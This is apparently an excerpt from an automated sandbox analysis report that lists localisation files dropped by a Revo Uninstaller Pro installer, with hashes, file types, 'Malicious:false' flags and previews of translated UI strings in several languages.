                                                                                                                                            SHA-512:D1337F8723E5C3FAD06AFF44E2DE82D7DC9A42614C7F88C465BE28665EEF2374DE75C788D335112CAF54F24562354D2B03175EBC7E567FEE60522E6EA1A1BCFE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h. .....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .P.o.r.t.u.g.u...s./.P.o.r.t.u.g.u.e.s.e.....W.e.b.L.a.n.g.=.P.T.G.....T.r.a.n.s.l.a.t.o.r.=.L.u.i.s. .N.e.v.e.s. .(.l.u.i.s...a...n.e.v.e.s.@.s.a.p.o...p.t.). . .....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.r.....1.0.3. .=. .O.p.....e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .F.e.r.r.a.m.e.n.t.a.s.....1.0.6. .=. .M.o.d.o. .C.a...a.d.o.r. .....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. ...c.o.n.e.s.....1.0.9. .=. .D.e.t.a.l.h.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r. .....1.1.1. .=. .R.e.m.o.v.e.r. .e.n.t.r.a.d.a. .....1.1.2. .=. .A.c.t.u.a.l.i.z.a.r. .....1.1.3. .=. .T.e.m. .a. .c.e.r.t.e.z.a. .q.u.e. .d.e.s.e.j.a. .r.e.m.o.v.e.r. .a. .e.n.t.r.a.d.a. .s.e.l.e.c.c.i.o.n.a.d.a.?.....1.1.4. .=. .T.e.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (772), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):125262
                                                                                                                                            Entropy (8bit):3.4481536085983775
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:MOghAQX7wHPV3eonAqBL2h2OUFD5LVpi9:lghv5oK
                                                                                                                                            MD5:B5AA8BE80DAE51043BA6408D1D6B107E
                                                                                                                                            SHA1:6BE2B588839C87B3D8F25C3F5BEB7975AECB98E0
                                                                                                                                            SHA-256:E20F73F5E342B823B79F1C8C4D7EEF101A09127DB0700FCD79FDEF43F3CC25D7
                                                                                                                                            SHA-512:7CBFFEF592359D953A12788C558EF6AB31B468AA5ECC774FD3D22E3279C82DBAF16B1849F1B99A820F189FA36FFFA4564A2C3D7EC5042EB191FF390BB943828C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h. .....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.P.o.r.t.u.g.u...s. .(.P.o.r.t.u.g.a.l.).....W.e.b.L.a.n.g.=.P.T.G.S.T.D.....T.r.a.n.s.l.a.t.o.r.=.M.a.n.u.e.l.a. .S.i.l.v.a. .-. .L.u.i.s. .N.e.v.e.s. .(.l.u.i.s...a...n.e.v.e.s.@.s.a.p.o...p.t.). .-. .P.l.e.a.s.e. .d.o.n.'.t. .r.e.m.o.v.e. .t.h.e. .t.r.a.n.s.l.a.t.i.o.n. .w.i.t.h. .A.O. .1.9.9.0... .....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...0...5.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.r.....1.0.3. .=. .O.p.....e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .F.e.r.r.a.m.e.n.t.a.s.....1.0.6. .=. .M.o.d.o. .P.e.s.q.u.i.s.a. .....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. ...c.o.n.e.s.....1.0.9. .=. .D.e.t.a.l.h.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r. .....1.1.1. .=. .R.e.m.o.v.e.r. .E.n.t.r.a.d.a. .....1.1.2. .=. .A.t.u.a.l.i.z.a.r. .....1.1.3.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (724), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):131952
                                                                                                                                            Entropy (8bit):3.471989974502818
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:FrEbxaRaTtwkYAUc0tPNfKp+2MS1TXjUiU8v908:6bxaRaTqkVU3lNfKp+2MS1TXjUZWt
                                                                                                                                            MD5:BA3D16BF985F428DAB06AAA6CE7CE7B4
                                                                                                                                            SHA1:C8980ECE865ECD907A0FE43B8D2E898BE3276DFF
                                                                                                                                            SHA-256:F17E90AAC63F2E9630C81D73B9756A41B951874C44A483AA4E354D013E70D8B8
                                                                                                                                            SHA-512:0140E007F63F4BB84F6340C153E21138504292B1EA6EA7483747212CF4D437C5D449FE10989B4E341D9B3554B20BD780EBADC3D61C481FB25BB3F6653A1557CD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h. .....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.P.o.r.t.u.g.u...s. ./. .P.o.r.t.u.g.u.e.s.e.(.B.r.a.s.i.l.).....W.e.b.L.a.n.g.=.P.T.-.B.R.....T.r.a.n.s.l.a.t.o.r.=.H...l.i.o. .d.e. .S.o.u.z.a. ./. .R.u.l.i.e.n. .O.l.d.a.n.i.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...0...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .E.x.i.b.i.r.....1.0.3. .=. .O.p.....e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .F.e.r.r.a.m.e.n.t.a.s.....1.0.6. .=. .M.o.d.o.\.n.C.a...a.d.o.r. .....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.c.o.n.e.s.....1.0.9. .=. .D.e.t.a.l.h.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r. .....1.1.1. .=. .R.e.m.o.v.e.r. .e.n.t.r.a.d.a. .....1.1.2. .=. .A.t.u.a.l.i.z.a.r. .....1.1.3. .=. .D.e.s.e.j.a. .r.e.m.o.v.e.r. .a. .e.n.t.r.a.d.a. .s.e.l.e.c.i.o.n.a.d.a.?.....1.1.4. .=. .D.e.s.e.j.a. .d.e.s.i.n.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (746), with CRLF, CR line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):138760
                                                                                                                                            Entropy (8bit):3.5938846070402
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:HN2MUMqfeZIyimlMWqCZLhewtbOIYe/1ifCWUINoE/hOsbg00p:t9UKXZ1eSjVA/U
                                                                                                                                            MD5:C76ADB4BB2BDB3722F0D0AA395F16262
                                                                                                                                            SHA1:B4594519DD221ECAEFC0D90909157F9C124811CE
                                                                                                                                            SHA-256:4635B47EFC36101D5AC7BBE3D529EF4850A2785CA59B8DD08541873D2579C083
                                                                                                                                            SHA-512:ABB1FCA558326124605D24B79670871B30E91977F1DA14DEC36AE61B5D3B53FB294ED80A3EF111B138B2970F9D3D22C7FAAB810A87613CD035614D4A05D69F33
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.R.o.m...n... ./. .R.o.m.a.n.i.a.n.....W.e.b.L.a.n.g.=.R.O.....T.r.a.n.s.l.a.t.o.r.=.A.l.e.x.a.n.d.r.u. .B.o.g.d.a.n. .M.u.n.t.e.a.n.u.,. .M.a.r.i.n.e.l. .C.i.p.u.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.d.e.r.e.....1.0.3. .=. .O.p...i.u.n.i.....1.0.4. .=. .D.e.z.i.n.s.t.a.l.a.t.o.r.....1.0.5. .=. .U.n.e.l.t.e.....1.0.6. .=. .V...n...t.o.r.....1.0.7. .=. .L.i.s.t.......1.0.8. .=. .I.c.o.a.n.e.....1.0.9. .=. .D.e.t.a.l.i.i.....1.1.0. .=. .D.e.z.i.n.s.t.a.l.e.a.z.......1.1.1. .=. ...n.l...t.u.r.......1.1.2. .=. ...m.p.r.o.s.p...t.e.a.z.......1.1.3. .=. .S.i.g.u.r. .v.r.e.i. .s... ...n.l...t.u.r.i. .i.n.t.r.a.r.e.a. .s.e.l.e.c.t.a.t...?.....1.1.4. .=. .S.i.g.u.r. .v.r.e.i. .s... .d.e.z.i.n.s.t.a.l.e.z.i. .p.r.o.g.r.a.m.u.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (770), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):136156
                                                                                                                                            Entropy (8bit):3.9772752876308854
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:Ugzuz4NjXBv1p4Yo2PklcxThfaZE2kYK1X5+P3b1rIdkXmU+g9X:Ug86XBv1p4Yo2PklcxThfaZE2DP3b1rX
                                                                                                                                            MD5:A3F615CEE1B2AB1423853E0DCE67812C
                                                                                                                                            SHA1:80EF64ABB8D7C8DBDEA00FD5552956F1750F3FF5
                                                                                                                                            SHA-256:C4A2025D189CB616B4CFC45BAC348CF36D583964EA1936DF309C03CDA5C0104C
                                                                                                                                            SHA-512:5D4C7AEA6E50B1DD4BE63357F04C3C1DA148BF6D5F8A55E797B405046EDBB8CF9858407F6A663F78A372992D6888A64ADB6AAE605C21C6B9ABF750CAAA18EDC9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e. .=. . .C.A.A.:.8.9./.R.u.s.s.i.a.n.....W.e.b.L.a.n.g.=.R.U.S.....T.r.a.n.s.l.a.t.o.r. .=. .V.S. .R.e.v.o. .G.r.o.u.p.,. .e.d.i.t.e.d. .b.y. .L.u.b.e.r.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...8.4.....1.0.3. .=. ...0.@.0.<.5.B.@.K.....1.0.4. .=. ...5.8.=.A.B.0.;.;.O.F.8.O.....1.0.5. .=. ...=.A.B.@.C.<.5.=.B.K.....1.0.6. .=. . .5.6.8.<. .>.E.>.B.K.....1.0.7. .=. .!.?.8.A.>.:.....1.0.8. .=. ...=.0.G.:.8.....1.0.9. .=. .".0.1.;.8.F.0.....1.1.0. .=. .#.4.0.;.8.B.L.....1.1.1. .=. .#.4.0.;.8.B.L.....1.1.2. .=. ...1.=.>.2.8.B.L.....1.1.3. .=. ...K. .4.5.9.A.B.2.8.B.5.;.L.=.>. .E.>.B.8.B.5. .C.4.0.;.8.B.L. .2.K.1.@.0.=.=.K.9. .M.;.5.<.5.=.B. .8.7. .@.5.5.A.B.@.0.?.....1.1.4. .=. ...K. .4.5.9.A.B.2.8.B.5.;.L.=.>. .E.>.B.8.B.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (436), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):96936
                                                                                                                                            Entropy (8bit):3.9548685823094414
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:Mlyvi0HQGqlUfM9T4xYIvZttVc1bVBuqqe25IHo06TVp0DK9k8hLoS60thmlLqtK:Mlyvi0HQGqlUfM54xYIvZttVc1bVBuqZ
                                                                                                                                            MD5:8A38541BEFDD4A83B3413AF88AB27792
                                                                                                                                            SHA1:977AE354F1D8529384C241B87232BAAD2A9217C5
                                                                                                                                            SHA-256:D005F31F65527C1C409B1B43BA1BD0020310C1DDCAB58964BE5F763037F0314D
                                                                                                                                            SHA-512:C1D954B632DF9DB0F7788E10074BF32DFC306B6D933EBE0A8F778FD831EBFB5DD4908B411430B911515E2AA676C8244E45B3BC4574793B62B193FDACDAECA080
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.!.@.?.A.:.8./.S.e.r.b.i.a.n. .....W.e.b.L.a.n.g.=.S.R.B.L.T.....T.r.a.n.s.l.a.t.o.r.=.D.r.a.g.a.n. .B.j.e.d.o.v. .d.r.a.g.a.n.b.j.e.d.o.v.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.3...1...1.............[.D.e.i.n.s.t.a.l.e.r. .L.i.n.i.j.a. .s.a. .a.l.a.t.k.a.m.a.].....1.0.2. .=. ...7.3.;.5.4.....1.0.3. .=. ...>.A.B.0.2.:.5.....1.0.4. .=. ...5.8.=.A.B.0.;.5.@.....1.0.5. .=. ...;.0.B.8.....1.0.6. .=. ...@.5.A.@.5.B.0.Z.5.....1.0.7. .=. ...8.A.B.0.....1.0.8. .=. ...:.>.=.5.....1.0.9. .=. ...5.B.0.Y.8.....1.1.0. .=. ...5.8.=.A.B.0.;.8.@.0.X.....1.1.1. .=. .#.:.;.>.=.8. .C.=.>.A.....1.1.2. .=. ...A.2.5.6.8.....1.1.3. .=. .#.:.;.>.=.8.B.8. .>.7.=.0.G.5.=.8. .C.=.>.A.?.....1.1.4. .=. ...5.8.=.A.B.0.;.8.@.0.B.8. .>.7.=.0.G.5.=.8. .?.@.>.3.@.0.<.?.....1.1.5. .=. ...>.3.@.0.4.Z.0.....1.1.6. .=.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (446), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):97878
                                                                                                                                            Entropy (8bit):3.537880363749942
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:woApxpwVcmmL4Htk5SWgduiI/Qyi+9QEo62eTLDme0HLZzzAiY+4mc0MzpUnjhq4:sxpcCSWV/Qa7vb0HFHlbRcVzqt6pTkd
                                                                                                                                            MD5:6FF7FBB4F81CEF6CEE58E8A9A3973B23
                                                                                                                                            SHA1:FDAA6816A3172EB4FB336B364B7DCDEC9F807412
                                                                                                                                            SHA-256:E57B607071C548D701BDD2700D7D70B554FA27292CAE1043F622597235CBA1EF
                                                                                                                                            SHA-512:FD623CA0205134A94C8D8A46722F6623802C55C69F22DD83F6C4DA32107337BEA20A5B4BE4307151327FF6D5AEFB0FDABB323D903B7789F42CD4907C6E49DDB3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.S.r.p.s.k.i./.S.e.r.b.i.a.n. .....W.e.b.L.a.n.g.=.S.R.B.L.T.....T.r.a.n.s.l.a.t.o.r.=.D.r.a.g.a.n. .B.j.e.d.o.v. .d.r.a.g.a.n.b.j.e.d.o.v.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.3...1...1.............[.D.e.i.n.s.t.a.l.e.r. .L.i.n.i.j.a. .s.a. .a.l.a.t.k.a.m.a.].....1.0.2. .=. .I.z.g.l.e.d.....1.0.3. .=. .P.o.s.t.a.v.k.e.....1.0.4. .=. .D.e.i.n.s.t.a.l.e.r.....1.0.5. .=. .A.l.a.t.i.....1.0.6. .=. .P.r.e.s.r.e.t.a.n.j.e.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.k.o.n.e.....1.0.9. .=. .D.e.t.a.l.j.i.....1.1.0. .=. .D.e.i.n.s.t.a.l.i.r.a.j.....1.1.1. .=. .U.k.l.o.n.i. .u.n.o.s.....1.1.2. .=. .O.s.v.e.~.i.....1.1.3. .=. .U.k.l.o.n.i.t.i. .o.z.n.a...e.n.i. .u.n.o.s.?.....1.1.4. .=. .D.e.i.n.s.t.a.l.i.r.a.t.i. .o.z.n.a...e.n.i. .p.r.o.g.r.a.m.?.....1.1.5. .=. .D.o.g.r.a.d.n.j.a.....1.1.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):58204
                                                                                                                                            Entropy (8bit):5.700930679207834
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lo5zGJ0/0BCAJQbmrd16Qo6DzKCvytFvNOv+0syWNgZC3L51N5K0gI9+O/nuGNLM:KzmlQodpo6ktF1++0DWNgW6fuHE8M7
                                                                                                                                            MD5:6CB9F788594E515436E812AF86CE6971
                                                                                                                                            SHA1:3E2EFCD077D3E91C1B22C511EBB8F9DC8087C3DF
                                                                                                                                            SHA-256:C5AC1F6567EB3FDC2BB7809853F8F8D90D0DCEFCAC1E7EE881316AEFDE3D65EC
                                                                                                                                            SHA-512:70FD68DFB13EB4EFCA05E9963D64E779EFF6CF4B3DCFD9AFA54E4374D91B2F82C6A3AF023F28A53057EE0C944FEE847896723E0EBCE4854308EA0159008913CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=..{SO-N.e ./. .S.i.m.p.l.i.f.i.e.d.C.h.i.n.e.s.e.....W.e.b.L.a.n.g.=.S.C.H.....T.r.a.n.s.l.a.t.o.r.=.Y.i. .L.a.n. .(.m.e.@.y.i.l.a.n.j.u...c.o.m.).,.f.a.i.r.y.c.n.@.1.3.9...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...2...6.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...V....1.0.3. .=. ...y.....1.0.4. .=. .xS}.hV....1.0.5. .=. ..]wQ....1.0.6. .=. ..s.N!j._....1.0.7. .=. ..Rh.....1.0.8. .=. ..V.h....1.0.9. .=. ..~......1.1.0. .=. .xS}.....1.1.1. .=. . Rd.ag.v....1.1.2. .=. .7R.e....1.1.3. .=. ..`nx.[.. Rd.@b..ag.v.T?.....1.1.4. .=. ..`nx.[.. Rd.@b...z.^.T?.....1.1.5. .=. ..R.f.e....1.1.6. .=. ..^.R....1.1.7. .=. .S_MR.]wQ.^.R..........1.1.8. .=. .;Nu...........1.1.9. .=. .sQ.N..........1.2.0. .=. ..`.N/f.|.~.{.tXT!.....1.2.1. .=. ..`nx.[.. Rd.@b...|.~.~.N.T?.\.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (510), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):117334
                                                                                                                                            Entropy (8bit):3.716232017222656
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:zoD4FEnB1D2yGMrJQK141CsyubT5GZGzC/v9OQ8+:zOV2LO
                                                                                                                                            MD5:9E9BB9C33D54BE4D2A74E4540F99585D
                                                                                                                                            SHA1:6F3733A4C377EBCDCC10E5811611AD26E6A8857F
                                                                                                                                            SHA-256:830BBF9501D2BC51E52AC755FA26090298C5E6895BC9091AED97F506E0C9D4E8
                                                                                                                                            SHA-512:75352F8809FD54C17026FE3220923398C18EE20B219F0C0E6970DA80F7483B63039FD4FF32632AD65C3B43B4EB3A345FF30AF59D9AA3AFB3AD97671B78DA0C4E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .S.l.o.v.e.n...i.n.a./.S.l.o.v.a.k.....W.e.b.L.a.n.g.=.S.K.....T.r.a.n.s.l.a.t.o.r.=.L.u.m.i.r. .-. .l.u.m.i.r.e.s.k.u.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...0...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .Z.o.b.r.a.z.e.n.i.e.....1.0.3. .=. .N.a.s.t.a.v.e.n.i.a.....1.0.4. .=. .O.d.i.n.a.t.a.l...t.o.r.....1.0.5. .=. .N...s.t.r.o.j.e.....1.0.6. .=. .R.e.~.i.m. .l.o.v.c.a.....1.0.7. .=. .Z.o.z.n.a.m.....1.0.8. .=. .I.k.o.n.y.....1.0.9. .=. .P.o.d.r.o.b.n.o.s.t.i.....1.1.0. .=. .O.d.i.n.a.t.a.l.o.v.a.e.....1.1.1. .=. .O.d.s.t.r...n.i.e.....1.1.2. .=. .O.b.n.o.v.i.e.....1.1.3. .=. .U.r...i.t.e. .c.h.c.e.t.e. .o.d.s.t.r...n.i.e. .v.y.b.r.a.t... .p.o.l.o.~.k.u.?.....1.1.4. .=. .U.r...i.t.e. .c.h.c.e.t.e. .o.d.i.n.a.t.a.l.o.v.a.e. .v.y.b.r.a.t...
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (679), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):133602
                                                                                                                                            Entropy (8bit):3.516276711475207
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:Vk8NAAdeen1o1CGzbaTe2awmWp1FWgyLR8c3O:mW
                                                                                                                                            MD5:C818A5793997CE34224359777E094BD5
                                                                                                                                            SHA1:3A64A87007A2793FEDEE099B283A3F0383BF2F74
                                                                                                                                            SHA-256:94123A86FA77F670133E4849FCFCD0564CBA01178075E778B67AB790C619E9AB
                                                                                                                                            SHA-512:BD7D40ABCA01A1CB1397F7332F77FE52579AAB8ED33585C7E7787C9991C768E2BF062D3367A9A36B3A2B5404CC6E63085933241FDBC4676751435194427DCF9C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.S.l.o.v.e.n.a...i.n.a./.S.l.o.v.e.n.i.a.n.....W.e.b.L.a.n.g.=.S.I.....T.r.a.n.s.l.a.t.o.r.=.V.i.n.k.o. .K.a.s.t.e.l.i.c.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .P.o.g.l.e.d.....1.0.3. .=. .N.a.s.t.a.v.i.t.v.e.....1.0.4. .=. .O.d.s.t.r.a.n.j.e.v.a.l.n.i.k.....1.0.5. .=. .O.r.o.d.j.a.....1.0.6. .=. .L.o.v.e.c. .....1.0.7. .=. .S.e.z.n.a.m.....1.0.8. .=. .I.k.o.n.e.....1.0.9. .=. .P.o.d.r.o.b.n.o.s.t.i.....1.1.0. .=. .O.d.s.t.r.a.n.i.....1.1.1. .=. .O.d.s.t.r.a.n.i. .v.n.o.s.....1.1.2. .=. .O.s.v.e.~.i.....1.1.3. .=. .S.t.e. .p.r.e.p.r.i...a.n.i.,. .d.a. .~.e.l.i.t.e. .o.d.s.t.r.a.n.i.t.i. .i.z.b.r.a.n.i. .v.n.o.s.?.....1.1.4. .=. .S.t.e. .p.r.e.p.r.i...a.n.i.,. .d.a. .~.e.l.i.t.e. .o.d.s.t.r.a.n.i.t.i. .i.z.b.r.a.n.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (619), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):135850
                                                                                                                                            Entropy (8bit):3.4417582346095577
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lo6exv60KMuKMJ3XUvR7kcuKO+1vWbNPD5Etnx7qVwF/Z4DeTO9fMLp/GAwljIeK:axS0RuKMqR7kcuy1vWbUd/GV+Lbfn
                                                                                                                                            MD5:AC710839BFC0EB302C8CB6A5194E1B6F
                                                                                                                                            SHA1:7721A6CC3C22585ACF111F53C426FC0AF6602000
                                                                                                                                            SHA-256:E88253ECC79EC3E528BD2ACCF23181830C06CA09F1912CAB6CE0E3C6A903AFBA
                                                                                                                                            SHA-512:9E91C669A51F9EE1594F245774DD674FBE78CA8115F9EE8B07038C5D0DF505DBB016746332D25DA8943A026967ADEE0233448C352E89C58207BB959C9C9C0A2D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.E.s.p.a...o.l./.S.p.a.n.i.s.h.....W.e.b.L.a.n.g.=.E.S.P.....T.r.a.n.s.l.a.t.o.r.=.J.o.s.e. .L.u.i.s. .V.i.l.l.a.l.b.a. .S.a.n.c.h.e.z.,. .F.e.r.n.a.n.d.o. .G.r.e.g.o.i.r.e.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.r.....1.0.3. .=. .O.p.c.i.o.n.e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .H.e.r.r.a.m.i.e.n.t.a.s.....1.0.6. .=. .M.o.d.o. .S.i.l.e.n.c.i.o.s.o.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.c.o.n.o.s.....1.0.9. .=. .D.e.t.a.l.l.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r.....1.1.1. .=. .Q.u.i.t.a.r. .E.n.t.r.a.d.a.....1.1.2. .=. .R.e.f.r.e.s.c.a.r.....1.1.3. .=. ...E.s.t... .s.e.g.u.r.o. .d.e. .q.u.e. .d.e.s.e.a. .q.u.i.t.a.r. .l.a. .e.n.t.r.a.d.a. .s.e.l.e.c.c.i.o.n.a.d.a.?.....1.1.4. .
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (767), with CRLF line terminators
                                                                                                                                            Category:dropped
